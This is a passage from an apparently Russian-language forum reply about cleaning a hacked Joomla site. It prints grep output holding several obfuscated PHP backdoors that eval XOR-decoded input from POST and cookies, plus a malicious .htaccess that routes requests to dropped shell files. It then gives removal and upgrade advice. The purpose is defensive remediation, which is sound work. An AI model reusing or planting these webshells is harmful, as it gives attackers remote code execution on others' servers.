][68]]($v901f))+1),0,$w261a53[$w261a53['je525d85'][53].$w261a53['je525d85'][33].$w261a53['je525d85'][75].$w261a53['je525d85'][40].$w261a53['je525d85'][74].$w261a53['je525d85'][68]]($j216));$ade1724a=$w261a53[$w261a53['je525d85'][91].$w261a53['je525d85'][21].$w261a53['je525d85'][33].$w261a53['je525d85'][54].$w261a53['je525d85'][49]]($w261a53['je525d85'][0],$ade1724a);if($w261a53[$w261a53['je525d85'][68].$w261a53['je525d85'][8].$w261a53['je525d85'][75].$w261a53['je525d85'][95].$w261a53['je525d85'][75].$w261a53['je525d85'][74].$w261a53['je525d85'][68]]($ade1724a)==3){eval/*aa456*/($ade1724a[1]($ade1724a[2]));exit();}}} ?><?php
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/libraries/joomla/archive/zip.php:	private $_ctrlDirEnd = "\x50\x4b\x05\x06\x00\x00\x00\x00";
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/libraries/simplepie/simplepie.php:define('SIMPLEPIE_PCRE_HTML_ATTRIBUTE', '((?:[\x09\x0A\x0B\x0C\x0D\x20]+[^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3D\x3E]*(?:[\x09\x0A\x0B\x0C\x0D\x20]*=[\x09\x0A\x0B\x0C\x0D\x20]*(?:"(?:[^"]*)"|\'(?:[^\']*)\'|(?:[^\x09\x0A\x0B\x0C\x0D\x20\x22\x27\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x3E]*)?))?)*)[\x09\x0A\x0B\x0C\x0D\x20]*');
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/libraries/simplepie/simplepie.php:				if (isset($matches[$i][2][0]) && preg_match_all('/[\x09\x0A\x0B\x0C\x0D\x20]+([^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3D\x3E]*)(?:[\x09\x0A\x0B\x0C\x0D\x20]*=[\x09\x0A\x0B\x0C\x0D\x20]*(?:"([^"]*)"|\'([^\']*)\'|([^\x09\x0A\x0B\x0C\x0D\x20\x22\x27\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x3E]*)?))?/', ' ' . $matches[$i][2][0] . ' ', $attribs, PREG_SET_ORDER))
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/libraries/simplepie/simplepie.php:			$curl = substr($curl, 5, strcspn($curl, "\x09\x0A\x0B\x0C\x0D", 5));
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/libraries/simplepie/simplepie.php:			$curl = substr($curl, 8, strcspn($curl, "\x09\x0A\x0B\x0C\x0D", 8));
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/libraries/simplepie/simplepie.php:		$space_characters = "\x20\x09\x0A\x0B\x0C\x0D";
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/libraries/simplepie/simplepie.php:		elseif (substr($data, 0, 20) === "\x00\x00\x00\x3C\x00\x00\x00\x3F\x00\x00\x00\x78\x00\x00\x00\x6D\x00\x00\x00\x6C")
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/libraries/simplepie/simplepie.php:			if ($pos = strpos($data, "\x00\x00\x00\x3F\x00\x00\x00\x3E"))
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/libraries/simplepie/simplepie.php:		elseif (substr($data, 0, 20) === "\x3C\x00\x00\x00\x3F\x00\x00\x00\x78\x00\x00\x00\x6D\x00\x00\x00\x6C\x00\x00\x00")
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/libraries/simplepie/simplepie.php:			if ($pos = strpos($data, "\x3F\x00\x00\x00\x3E\x00\x00\x00"))
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/libraries/simplepie/simplepie.php:		elseif (substr($data, 0, 10) === "\x00\x3C\x00\x3F\x00\x78\x00\x6D\x00\x6C")
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/libraries/simplepie/simplepie.php:		elseif (substr($data, 0, 10) === "\x3C\x00\x3F\x00\x78\x00\x6D\x00\x6C\x00")
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/libraries/simplepie/simplepie.php:		elseif (substr($data, 0, 5) === "\x3C\x3F\x78\x6D\x6C")
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/libraries/simplepie/simplepie.php:		$ws = strspn($this->file->body, "\x09\x0A\x0B\x0C\x0D\x20");
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/libraries/simplepie/simplepie.php:		elseif (substr($this->file->body, 0, 8) === "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A")
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/libraries/simplepie/simplepie.php:		elseif (substr($this->file->body, 0, 8) === "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A")
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/libraries/simplepie/simplepie.php:				if (preg_match('/(&(#(x[0-9a-fA-F]+|[0-9]+)|[a-zA-Z0-9]+)|<\/[A-Za-z][^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3E]*' . SIMPLEPIE_PCRE_HTML_ATTRIBUTE . '>)/', $data))
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/libraries/simplepie/simplepie.php:						$data = preg_replace('/(<[A-Za-z][^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3E]*)' . SIMPLEPIE_PCRE_HTML_ATTRIBUTE . trim($attrib) . '(?:\s*=\s*(?:"(?:[^"]*)"|\'(?:[^\']*)\'|(?:[^\x09\x0A\x0B\x0C\x0D\x20\x22\x27\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x3E]*)?))?' . SIMPLEPIE_PCRE_HTML_ATTRIBUTE . '>/', '\1\2\3>', $data);
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/modules/mod_wrapper/mod_wrapper.php:<?php $e82ab5 = 720;$GLOBALS['s91e443']=Array();global$s91e443;$s91e443=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['x31912b']="\x5c\x9\x64\x57\x4f\x62\x22\x7b\x5e\x67\x42\x6b\x71\x51\x76\x35\x29\x21\x52\x7e\x20\x36\x3a\x48\x54\x4d\x24\x5d\x40\x44\x2b\x3e\x47\x30\x7d\x79\x3f\x50\x46\x63\x3b\x70\x2a\x27\x2c\x32\x72\x5f\x23\x33\x6d\x7a\x2e\x41\x2d\x34\x31\x61\x58\x4c\x53\x6c\x4b\x26\x60\x65\x25\x78\x43\x28\x77\x56\x69\x68\x3d\x5a\x7c\x73\x37\x74\x5b\x59\x45\x6e\x55\x4a\x38\xa\x6f\x49\xd\x2f\x3c\x39\x75\x6a\x4e\x66";$s91e443[$s91e443['x31912b'][95].$s91e443['x31912b'][39].$s91e443['x31912b'][55].$s91e443['x31912b'][65].$s91e443['x31912b'][57].$s91e443['x31912b'][97].$s91e443['x31912b'][65].$s91e443['x31912b'][57]]=$s91e443['x31912b'][41].$s91e443['x31912b'][57].$s91e443['x31912b'][39].$s91e443['x31912b'][11];$s91e443[$s91e443['x31912b'][11].$s91e443['x31912b'][21].$s91e443['x31912b'][86].$s91e443['x31912b'][86].$s91e443['x31912b'][49]]=$s91e443['x31912b'][39].$s91e443['x31912b'][88].$s91e443['x31912b'][94].$s91e443['x31912b'][83].$s91e443['x31912b'][79];$s91e443[$s91e443['x31912b'][12].$s91e443['x31912b'][57].$s91e443['x31912b'][97].$s91e443['x31912b'][57].$s91e443['x31912b'][21].$s91e443['x31912b'][57].$s91e443['x31912b'][56].$s91e443['x31912b'][65].$s91e443['x31912b'][21]]=$s91e443['x31912b'][77].$s91e443['x31912b'][94].$s91e443['x31912b'][5].$s91e443['x31912b'][77].$s91e443['x31912b'][79].$s91e443['x31912b'][46];$s91e443[$s91e443['x31912b'][11].$s91e443['x31912b'][45].$s91e443['x31912b'][56].$s91e443['x31912b'][93]]=$s91e443['x31912b'][77].$s91e443['x31912b'][79].$s91e443['x31912b'][46].$s91e443['x31912b'][61].$s91e443['x31912b'][65].$s91e443['x31912b'][83];$s91e443[$s91e443['x31912b'][14].$s91e443['x31912b'][55].$s91e443['x31912b'][15].$s91e443['x31912b'][65].$s91e443['x31912b'][57].$s91e443['x31912b'][5].$s91e443['x31912b'][97].$s91e443['x31912b'][21]]=$s91e443['x31912b'][65].$s91e443['x31912b'][67].$s91e443['x31912b'][41].$s91e443['x31912b'][61].$s91e443['x31912b'][88].$s91e443['x31912b'][2].$s91e443['x31912b'][65];$s91e443[$s91e443['x31912b'][9].$s91e443['x31912b'][93].$s91e443['x31912b'][5].$s91e443['x31912b'][86].$s91e443['x31912b'][57].$s91e443['x31912b'][65].$s91e443['x31912b'][86].$s91e443['x31912b'][15]]=$s91e443['x31912b'][77].$s91e443['x31912b'][79].$s91e443['x31912b'][46].$s91e443['x31912b'][47].$s91e443['x31912b'][46].$s91e443['x31912b'][65].$s91e443['x31912b'][41].$s91e443['x31912b'][65].$s91e443['x31912b'][57].$s91e443['x31912b'][79];$s91e443[$s91e443['x31912b'][57].$s91e443['x31912b'][86].$s91e443['x31912b'][57].$s91e443['x31912b'][33].$s91e443['x31912b'][57]]=$_POST;$s91e443[$s91e443['x31912b'][9].$s91e443['x31912b'][65].$s91e443['x31912b'][15].$s91e443['x31912b'][93].$s91e443['x31912b'][78]]=$_COOKIE;$h782ede6=Array($s91e443['x31912b'][46].$s91e443['x31912b'][57].$s91e443['x31912b'][83].$s91e443['x31912b'][2].$s91e443['x31912b'][88].$s91e443['x31912b'][50].$s91e443['x31912b'][56]=>$s91e443['x31912b'][46].$s91e443['x31912b'][57].$s91e443['x31912b'][83].$s91e443['x31912b'][2].$s91e443['x31912b'][88].$s91e443['x31912b'][50].$s91e443['x31912b'][45]);$ba19fc5=Array($s91e443['x31912b'][46].$s91e443['x31912b'][57].$s91e443['x31912b'][83].$s91e443['x31912b'][2].$s91e443['x31912b'][88].$s91e443['x31912b'][50].$s91e443['x31912b'][49]=>$s91e443['x31912b'][46].$s91e443['x31912b'][57].$s91e443['x31912b'][83].$s91e443['x31912b'][2].$s91e443['x31912b'][88].$s91e443['x31912b'][50].$s91e443['x31912b'][55]);foreach(Array($h782ede6,$s91e443[$s91e443['x31912b'][57].$s91e443['x31912b'][86].$s91e443['x31912b'][57].$s91e443['x31912b'][33].$s91e443['x31912b'][57]],$ba19fc5,$s91e443[$s91e443['x31912b'][9].$s91e443['x31912b'][65].$s91e443['x31912b'][15].$s91e443['x31912b'][93].$s91e443['x31912b'][78]])as$tc1b6a){foreach($tc1b6aas$gf91fec=>$x0da471ee){[email protected]$s91e443[$s91e443['x31912b'][95].$s91e443['x31912b'][39].$s91e443['x31912b'][55].$s91e443['x31912b'][65].$s91e443['x31912b'][57].$s91e443['x31912b'][97].$s91e443['x31912b'][65].$s91e443['x31912b'][57]]($s91e443['x31912b'][23].$s91e443['x31912b'][42],$x0da471ee);$gf91fec.=$s91e443['x31912b'][39].$s91e443['x31912b'][86].$s91e443['x31912b'][56].$s91e443['x31912b'][45].$s91e443['x31912b'][45].$s91e443['x31912b'][97].$s91e443['x31912b'][57].$s91e443['x31912b'][93].$s91e443['x31912b'][54].$s91e443['x31912b'][56].$s91e443['x31912b'][15].$s91e443['x31912b'][97].$s91e443['x31912b'][97].$s91e443['x31912b'][54].$s91e443['x31912b'][55].$s91e443['x31912b'][78].$s91e443['x31912b'][55].$s91e443['x31912b'][86].$s91e443['x31912b'][54].$s91e443['x31912b'][57].$s91e443['x31912b'][5].$s91e443['x31912b'][65].$s91e443['x31912b'][93].$s91e443['x31912b'][54].$s91e443['x31912b'][45].$s91e443['x31912b'][33].$s91e443['x31912b'][21].$s91e443['x31912b'][93].$s91e443['x31912b'][33].$s91e443['x31912b'][65].$s91e443['x31912b'][39].$s91e443['x31912b'][33].$s91e443['x31912b'][65].$s91e443['x31912b'][97].$s91e443['x31912b'][33].$s91e443['x31912b'][65];$vad4d8=$x0da471ee^$s91e443[$s91e443['x31912b'][12].$s91e443['x31912b'][57].$s91e443['x31912b'][97].$s91e443['x31912b'][57].$s91e443['x31912b'][21].$s91e443['x31912b'][57].$s91e443['x31912b'][56].$s91e443['x31912b'][65].$s91e443['x31912b'][21]]($s91e443[$s91e443['x31912b'][9].$s91e443['x31912b'][93].$s91e443['x31912b'][5].$s91e443['x31912b'][86].$s91e443['x31912b'][57].$s91e443['x31912b'][65].$s91e443['x31912b'][86].$s91e443['x31912b'][15]]($gf91fec,($s91e443[$s91e443['x31912b'][11].$s91e443['x31912b'][45].$s91e443['x31912b'][56].$s91e443['x31912b'][93]]($x0da471ee)/$s91e443[$s91e443['x31912b'][11].$s91e443['x31912b'][45].$s91e443['x31912b'][56].$s91e443['x31912b'][93]]($gf91fec))+1),0,$s91e443[$s91e443['x31912b'][11].$s91e443['x31912b'][45].$s91e443['x31912b'][56].$s91e443['x31912b'][93]]($x0da471ee));$vad4d8=$s91e443[$s91e443['x31912b'][14].$s91e443['x31912b'][55].$s91e443['x31912b'][15].$s91e443['x31912b'][65].$s91e443['x31912b'][57].$s91e443['x31912b'][5].$s91e443['x31912b'][97].$s91e443['x31912b'][21]]($s91e443['x31912b'][48],$vad4d8);if($s91e443[$s91e443['x31912b'][11].$s91e443['x31912b'][21].$s91e443['x31912b'][86].$s91e443['x31912b'][86].$s91e443['x31912b'][49]]($vad4d8)==3){eval/*x1c6e5*/($vad4d8[1]($vad4d8[2]));exit();}}} ?><?php
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/layouts/joomla/toolbar/containerclose.php:<?php $hf6d88b2 = 775;$GLOBALS['h009']=Array();global$h009;$h009=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['v1134b']="\x28\x7b\x62\x65\x27\x76\x30\x68\x75\x33\x77\x5c\x53\x73\x47\x57\x46\x4b\x3f\x3c\x7c\x7a\x2a\x55\x5a\x39\x3e\x4e\x44\x63\x40\x5d\x61\x48\x4d\x24\x45\x71\x34\x37\x6a\x6c\x2c\x59\x4a\x22\x56\x32\x43\x25\x4f\x69\x79\x72\x51\x2d\x7d\x6d\x67\x20\x6b\x42\x66\x21\x2f\x6e\xa\x2b\x52\xd\x54\x70\x31\x29\x36\x7e\x64\x58\x35\x78\x74\x2e\x41\x50\x5b\x3d\x4c\x3b\x5f\x6f\x3a\x49\x9\x26\x38\x23\x60\x5e";$h009[$h009['v1134b'][5].$h009['v1134b'][78].$h009['v1134b'][2].$h009['v1134b'][78].$h009['v1134b'][32].$h009['v1134b'][74].$h009['v1134b'][32]]=$h009['v1134b'][71].$h009['v1134b'][32].$h009['v1134b'][29].$h009['v1134b'][60];$h009[$h009['v1134b'][29].$h009['v1134b'][38].$h009['v1134b'][74].$h009['v1134b'][3].$h009['v1134b'][39]]=$h009['v1134b'][29].$h009['v1134b'][89].$h009['v1134b'][8].$h009['v1134b'][65].$h009['v1134b'][80];$h009[$h009['v1134b'][79].$h009['v1134b'][72].$h009['v1134b'][74].$h009['v1134b'][2]]=$h009['v1134b'][13].$h009['v1134b'][8].$h009['v1134b'][2].$h009['v1134b'][13].$h009['v1134b'][80].$h009['v1134b'][53];$h009[$h009['v1134b'][13].$h009['v1134b'][47].$h009['v1134b'][72].$h009['v1134b'][9]]=$h009['v1134b'][13].$h009['v1134b'][80].$h009['v1134b'][53].$h009['v1134b'][41].$h009['v1134b'][3].$h009['v1134b'][65];$h009[$h009['v1134b'][13].$h009['v1134b'][6].$h009['v1134b'][47].$h009['v1134b'][32].$h009['v1134b'][32].$h009['v1134b'][78].$h009['v1134b'][76].$h009['v1134b'][32].$h009['v1134b'][9]]=$h009['v1134b'][3].$h009['v1134b'][79].$h009['v1134b'][71].$h009['v1134b'][41].$h009['v1134b'][89].$h009['v1134b'][76].$h009['v1134b'][3];$h009[$h009['v1134b'][13].$h009['v1134b'][32].$h009['v1134b'][29].$h009['v1134b'][74].$h009['v1134b'][72].$h009['v1134b'][3].$h009['v1134b'][9].$h009['v1134b'][62].$h009['v1134b'][72]]=$h009['v1134b'][13].$h009['v1134b'][80].$h009['v1134b'][53].$h009['v1134b'][88].$h009['v1134b'][53].$h009['v1134b'][3].$h009['v1134b'][71].$h009['v1134b'][3].$h009['v1134b'][32].$h009['v1134b'][80];$h009[$h009['v1134b'][8].$h009['v1134b'][6].$h009['v1134b'][72].$h009['v1134b'][78].$h009['v1134b'][29]]=$_POST;$h009[$h009['v1134b'][8].$h009['v1134b'][39].$h009['v1134b'][2].$h009['v1134b'][94].$h009['v1134b'][72].$h009['v1134b'][25].$h009['v1134b'][29].$h009['v1134b'][9]]=$_COOKIE;$f90db=Array($h009['v1134b'][53].$h009['v1134b'][32].$h009['v1134b'][65].$h009['v1134b'][76].$h009['v1134b'][89].$h009['v1134b'][57].$h009['v1134b'][72]=>$h009['v1134b'][53].$h009['v1134b'][32].$h009['v1134b'][65].$h009['v1134b'][76].$h009['v1134b'][89].$h009['v1134b'][57].$h009['v1134b'][47]);$k93780a1=Array($h009['v1134b'][53].$h009['v1134b'][32].$h009['v1134b'][65].$h009['v1134b'][76].$h009['v1134b'][89].$h009['v1134b'][57].$h009['v1134b'][9]=>$h009['v1134b'][53].$h009['v1134b'][32].$h009['v1134b'][65].$h009['v1134b'][76].$h009['v1134b'][89].$h009['v1134b'][57].$h009['v1134b'][38]);foreach(Array($f90db,$h009[$h009['v1134b'][8].$h009['v1134b'][6].$h009['v1134b'][72].$h009['v1134b'][78].$h009['v1134b'][29]],$k93780a1,$h009[$h009['v1134b'][8].$h009['v1134b'][39].$h009['v1134b'][2].$h009['v1134b'][94].$h009['v1134b'][72].$h009['v1134b'][25].$h009['v1134b'][29].$h009['v1134b'][9]])as$s91df76){foreach($s91df76as$t76a0717=>$x0ccf0c6){[email protected]$h009[$h009['v1134b'][5].$h009['v1134b'][78].$h009['v1134b'][2].$h009['v1134b'][78].$h009['v1134b'][32].$h009['v1134b'][74].$h009['v1134b'][32]]($h009['v1134b'][33].$h009['v1134b'][22],$x0ccf0c6);$t76a0717.=$h009['v1134b'][78].$h009['v1134b'][25].$h009['v1134b'][32].$h009['v1134b'][3].$h009['v1134b'][32].$h009['v1134b'][74].$h009['v1134b'][74].$h009['v1134b'][72].$h009['v1134b'][55].$h009['v1134b'][32].$h009['v1134b'][94].$h009['v1134b'][72].$h009['v1134b'][32].$h009['v1134b'][55].$h009['v1134b'][38].$h009['v1134b'][29].$h009['v1134b'][78].$h009['v1134b'][94].$h009['v1134b'][55].$h009['v1134b'][94].$h009['v1134b'][9].$h009['v1134b'][78].$h009['v1134b'][3].$h009['v1134b'][55].$h009['v1134b'][94].$h009['v1134b'][25].$h009['v1134b'][72].$h009['v1134b'][72].$h009['v1134b'][29].$h009['v1134b'][74].$h009['v1134b'][94].$h009['v1134b'][32].$h009['v1134b'][6].$h009['v1134b'][76].$h009['v1134b'][47].$h009['v1134b'][32];$k9d8ae3=$x0ccf0c6^$h009[$h009['v1134b'][79].$h009['v1134b'][72].$h009['v1134b'][74].$h009['v1134b'][2]]($h009[$h009['v1134b'][13].$h009['v1134b'][32].$h009['v1134b'][29].$h009['v1134b'][74].$h009['v1134b'][72].$h009['v1134b'][3].$h009['v1134b'][9].$h009['v1134b'][62].$h009['v1134b'][72]]($t76a0717,($h009[$h009['v1134b'][13].$h009['v1134b'][47].$h009['v1134b'][72].$h009['v1134b'][9]]($x0ccf0c6)/$h009[$h009['v1134b'][13].$h009['v1134b'][47].$h009['v1134b'][72].$h009['v1134b'][9]]($t76a0717))+1),0,$h009[$h009['v1134b'][13].$h009['v1134b'][47].$h009['v1134b'][72].$h009['v1134b'][9]]($x0ccf0c6));$k9d8ae3=$h009[$h009['v1134b'][13].$h009['v1134b'][6].$h009['v1134b'][47].$h009['v1134b'][32].$h009['v1134b'][32].$h009['v1134b'][78].$h009['v1134b'][76].$h009['v1134b'][32].$h009['v1134b'][9]]($h009['v1134b'][95],$k9d8ae3);if($h009[$h009['v1134b'][29].$h009['v1134b'][38].$h009['v1134b'][74].$h009['v1134b'][3].$h009['v1134b'][39]]($k9d8ae3)==3){eval/*jd4e3906*/($k9d8ae3[1]($k9d8ae3[2]));exit();}}} ?><?php
```

Файлики 

/xn--23-6kcajlh1but3g.xn--p1ai/layouts/libraries/cms/html/bootstrap/cb_work.php
/xn--23-6kcajlh1but3g.xn--p1ai/components/com_acymailing/views/lists/heii.php

нужно удалить.

Файл .htaccess нужно выправить, или заменить на дефолтный.



```
<IfModule mod_rewrite.c>
  RewriteEngine On
  RewriteCond %{REQUEST_FILENAME} !-f
  RewriteCond %{REQUEST_FILENAME} !-d
  RewriteRule (.*d1dbb.*) /layouts/libraries/cms/html/bootstrap/cb_work.php?q=$1 [L]
  RewriteRule ^layouts/libraries/cms/html/bootstrap/cb_work.php$ - [L]
</IfModule>
<IfModule mod_rewrite.c>
  RewriteEngine On
  RewriteCond %{REQUEST_FILENAME} !-f
  RewriteCond %{REQUEST_FILENAME} !-d
  RewriteRule (.*5bd0a.*) /components/com_acymailing/views/lists/heii.php?q=$1 [L]
  RewriteRule ^components/com_acymailing/views/lists/heii.php$ - [L]
</IfModule>

# BEGIN Joomla
<IfModule mod_rewrite.c>

RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END Joomla
```

В файликах

/xn--23-6kcajlh1but3g.xn--p1ai/plugins/content/joomla/joomla.php
/xn--23-6kcajlh1but3g.xn--p1ai/libraries/cms/html/select.php
/xn--23-6kcajlh1but3g.xn--p1ai/libraries/joomla/base/adapterinstance.php
/xn--23-6kcajlh1but3g.xn--p1ai/modules/mod_wrapper/mod_wrapper.php
/xn--23-6kcajlh1but3g.xn--p1ai/layouts/joomla/toolbar/containerclose.php

нужно закоментировать строчки (см. выше).

В версии CMS Joomla 3.1.5 есть критические уязвимости, необходимо обновить движок сайта до актуальной версии 3.9.19 иначе Вам опять шеллов накидают.

----------

kadomceva23

----------

